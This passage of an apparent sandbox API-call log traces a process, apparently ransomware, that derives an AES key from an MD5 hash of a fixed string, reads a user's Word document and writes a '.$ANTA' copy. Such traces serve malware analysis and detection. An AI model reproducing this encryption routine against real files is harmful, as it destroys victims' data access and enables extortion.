lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0074.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0074.812] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0074.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0074.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0074.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0074.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0074.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0074.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0074.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0074.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0074.812] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0074.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0074.813] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0074.813] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0074.813] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0074.814] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0074.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0074.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2878, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0074.814] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0074.814] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0074.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0074.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0074.814] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0074.814] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0074.814] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0074.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0074.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0074.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca8b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0074.814] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2788, dwDataLen=0x22, dwFlags=0x1) returned 1 [0074.814] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0074.814] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0074.814] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0074.814] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0074.814] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0074.815] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0074.815] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0074.815] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0074.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0074.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca748, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0075.433] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac200) returned 1 [0075.436] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.436] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.436] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.436] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.436] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.436] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.436] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0075.436] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0075.436] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0075.436] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.436] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.436] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.436] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.436] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.437] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\16hIz1 tYfBoIcwVhJi.docx" (normalized: "c:\\users\\fd1hvy\\documents\\16hiz1 tyfboicwvhji.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0075.437] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.437] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0075.437] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.437] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.437] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.438] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0075.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0075.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0075.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0075.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0075.438] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\16hIz1 tYfBoIcwVhJi.docx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\16hiz1 tyfboicwvhji.docx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0075.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23b0 [0075.441] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0075.441] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.441] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0075.441] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0075.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0075.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0075.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0075.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0b020 [0075.445] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0075.445] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x5a50, lpOverlapped=0x0) returned 1 [0075.448] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0075.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0075.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.448] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0075.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0075.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5a50) returned 0x440b3b8 [0075.449] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0075.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0075.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0075.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0075.452] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.452] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5a50) returned 0x4410e10 [0075.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x440b3b8 | out: hHeap=0x1780000) returned 1 [0075.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.453] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0075.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0075.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0075.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0075.453] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5a50) returned 0x440b3b8 [0075.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0075.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x440b3b8 | out: hHeap=0x1780000) returned 1 [0075.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0075.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0075.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0075.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.454] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0075.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0075.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0075.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0075.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0075.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0075.454] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0075.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0075.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0075.454] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0075.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0075.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0075.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0075.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0075.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0075.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0075.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0075.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0075.454] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5a50) returned 0x440b3b8 [0075.454] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0075.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0075.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2570 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0075.455] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1d8 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0075.455] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5a50) returned 0x4416868 [0075.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0075.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0075.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0075.456] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0075.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0075.456] RtlAllocateHeap 